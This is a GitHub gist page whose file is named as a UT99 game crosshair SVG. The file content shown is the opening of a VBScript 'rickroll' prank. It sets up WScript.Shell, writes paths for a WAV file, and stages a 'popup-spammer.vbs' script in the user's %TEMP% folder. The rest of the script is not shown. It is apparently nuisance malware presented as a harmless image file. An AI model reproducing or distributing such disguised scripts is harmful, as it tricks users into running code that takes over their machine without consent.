Skip to content

Instantly share code, notes, and snippets.

View PastbearCode's full-sized avatar

Pastbear🐻 PastbearCode

View GitHub Profile
@PastbearCode
PastbearCode / ut99_crosshair.svg
Created July 11, 2025 20:25
My Scope and Crosshairfrom UT99
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
' Main rickroll script
Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
' WAV file path
wavPath = shell.ExpandEnvironmentStrings("%TEMP%\rickroll.wav")
' Path to popup spammer script
popupPath = shell.ExpandEnvironmentStrings("%TEMP%\popup-spammer.vbs")